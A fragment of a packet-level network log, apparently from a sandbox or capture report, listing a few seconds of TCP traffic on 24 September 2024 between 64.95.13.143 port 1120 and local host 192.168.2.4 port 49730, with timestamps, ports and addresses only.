Sep 24, 2024 17:46:12.689686060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689697981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689707994 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.689718962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689733982 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.689743996 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689779043 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.690169096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.690181017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.690196037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.690208912 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.690217972 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.690232038 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.690252066 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.690318108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.690330982 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.690346956 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.690357924 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.690386057 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.691514969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.691526890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.691540003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.691574097 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.691838980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.691852093 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.691871881 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.691881895 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.691912889 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.692044973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.692059040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.692097902 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.749761105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.749788046 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.749798059 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.749842882 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.749876022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.749888897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.749902010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.749912024 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.749923944 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.749946117 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.750233889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.750276089 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.773350954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.773364067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.773375988 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.773483038 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.773643017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.773655891 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.773668051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.773684978 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.773691893 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.773725033 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.778501987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.778539896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.778549910 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.778562069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.778605938 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.778764009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.778775930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.778788090 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.778801918 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.778815031 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.778835058 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.779170990 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779192924 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779205084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779216051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779228926 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779247999 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.779256105 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.779268980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779279947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779292107 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779300928 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.779313087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779330969 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.779453039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779464960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779476881 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779489994 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.779498100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779505968 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.779516935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779527903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779541969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779551029 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.779561996 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779576063 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.779582977 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779594898 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.779613972 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.780107021 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780118942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780132055 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780143976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780153036 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.780164957 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780173063 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.780184031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780199051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780205011 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.780215025 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780227900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780235052 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.780244112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780256987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780265093 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.780275106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780292988 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.780298948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780328989 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.780436039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780447960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780466080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780478954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780489922 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.780522108 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.780584097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780597925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780610085 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780622005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780631065 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.780658007 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.780872107 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780883074 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780894995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780908108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780916929 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.780927896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780940056 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780950069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.780961037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780972958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.780982971 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.780992985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781012058 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.781546116 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781560898 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781574011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781584024 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.781594992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781605959 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781615019 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.781625032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781640053 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.781645060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781657934 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781672001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781687021 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.781697989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781709909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781718016 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.781728029 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781740904 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781748056 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.781758070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781769037 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.781778097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781810045 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.781979084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.781990051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.782001972 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.782027960 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.782054901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.782067060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.782078981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.782087088 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.782098055 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.782115936 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.782831907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.782845020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.782857895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.782870054 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.782957077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.782967091 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.782974958 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.782985926 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.782996893 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.783008099 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.783305883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.783314943 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.783328056 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.783337116 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.783344984 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.783355951 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.783368111 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.783391953 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.783451080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.783462048 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.783474922 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.783483982 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.783509970 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.784420967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.784657001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.784668922 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.784697056 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.784739971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.784755945 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.784769058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.784779072 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.784789085 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.784810066 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.784862041 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.784900904 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.842751026 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.842768908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.842782021 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.842816114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.842829943 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.842843056 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.842863083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.842870951 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.842886925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.842945099 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.866723061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.866740942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.866755962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.866786003 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.866825104 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.867053032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.867067099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.867082119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.867103100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.867113113 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.867137909 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.871274948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.871289968 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.871306896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.871330976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.871344090 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.871360064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.871371984 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.871381044 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.871411085 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.871418953 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.871597052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.871608973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.871623039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.871638060 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.871654034 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.872080088 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872096062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872108936 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872133017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872145891 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.872155905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872170925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872176886 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.872186899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872201920 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872210026 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.872224092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872237921 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.872638941 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872652054 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872664928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872687101 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.872697115 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872708082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872715950 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.872728109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872740984 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.872750998 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.872786999 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.873033047 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873045921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873059034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873070955 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873079062 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.873090982 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873102903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873114109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873130083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873135090 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.873147964 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873156071 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.873173952 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.873306036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873318911 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873331070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873342991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873353004 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.873364925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873380899 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.873387098 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873398066 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.873610020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873620987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873631001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873645067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873656988 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873668909 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.873680115 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.873687983 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873697996 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.873709917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873747110 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.873924971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873935938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873949051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873961926 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.873971939 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.874180079 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.874293089 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874305010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874315977 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874327898 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874339104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874351025 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874361038 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.874371052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874385118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874392986 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.874403000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874413967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874424934 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.874434948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874447107 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874456882 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.874505043 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.874708891 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874720097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874732018 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874743938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874754906 CEST	1120	49730	64.95.13.143	192.168.2.4
